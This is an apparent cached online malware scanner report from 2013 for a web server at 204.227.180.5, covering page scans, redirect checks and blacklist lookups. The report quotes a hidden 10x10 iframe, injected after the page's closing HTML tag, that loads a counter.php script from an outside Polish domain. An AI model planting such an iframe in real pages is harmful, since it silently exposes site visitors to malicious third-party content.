Online Malware Scanner report for 204.227.180.5

(cached results from Fri Jul 12 16:51:44 2013 rescan)

Malicious/Suspicious/Total urls checked: 0/2/2 (2 pages have suspicious code. See details below)
Blacklists: OK
Malicious redirects: OK
Malicious/Hidden/Total iFrames: 0/1/1 (1 suspicious iframe found. See details below)
Deface / Content modification: OK

Scanned pages/files

Request: http://204.227.180.5/
Server response: 200 OK
Content-Length: 2493
Content-Type: text/html
Status: suspicious
Page code contains blacklisted domain: ds-sinjo.co.jp

...[1977 bytes skipped]...
Started" pages on our Web
site. We encourage you to visit these pages and add them to your list
of bookmarks.</FONT></FONT></P>
<P>
<FONT FACE="Arial,Helvetica,sans-serif"><FONT SIZE="2">To access your
Control Panel, please select the following link:</FONT></FONT></P>
<P>
<FONT FACE="Arial,Helvetica,sans-serif"><FONT SIZE="2">
<a href="https://ds-sinjo.co.jp/ControlPanel/">
https://ds-sinjo.co.jp/ControlPanel/</a>
</FONT></FONT></P>
<P>
<FONT FACE="Arial,Helvetica,sans-serif"><FONT SIZE="2">Then enter
your login and password.</FONT></FONT></P>
<P>
<FONT FACE="Arial,Helvetica,sans-serif"><FONT SIZE="2">Best wishes in
using your new Web Hosting Account!</FONT></FONT>
</BODY>
</HTML><iframe src="http://
...[126 bytes skipped]...

Hidden iFrame found.
size: 10x10     style: hidden
src: http://www.knurow.com.pl/counter.php

<iframe src="http://www.knurow.com.pl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Request: http://204.227.180.5/test404page.js
Server response: 404 Not Found
Content-Length: 279
Content-Type: text/html
Status: suspicious
Page code contains blacklisted domain: ds-sinjo.co.jp

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /test404page.js was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3.42 Server at ds-sinjo.co.jp Port 80</ADDRESS>
</BODY></HTML>


Malicious redirects

First query (normal visit):
GET / HTTP/1.1
Host: 204.227.180.5

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 12 Jul 2013 13:51:44 GMT
Accept-Ranges: bytes
ETag: "2e00cb6-9bd-5184a675"
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Content-Length: 2493
Content-Type: text/html
Last-Modified: Sat, 04 May 2013 06:11:01 GMT

...2493 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: 204.227.180.5
Referer: http://www.google.com/search?q=204.227.180.5

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=204.227.180.5

Result: This site is not currently listed as suspicious.

Query: http://yandex.ru/infected?l10n=en&url=http://204.227.180.5/

Result: 204.227.180.5 is not infected or malware details are not published yet.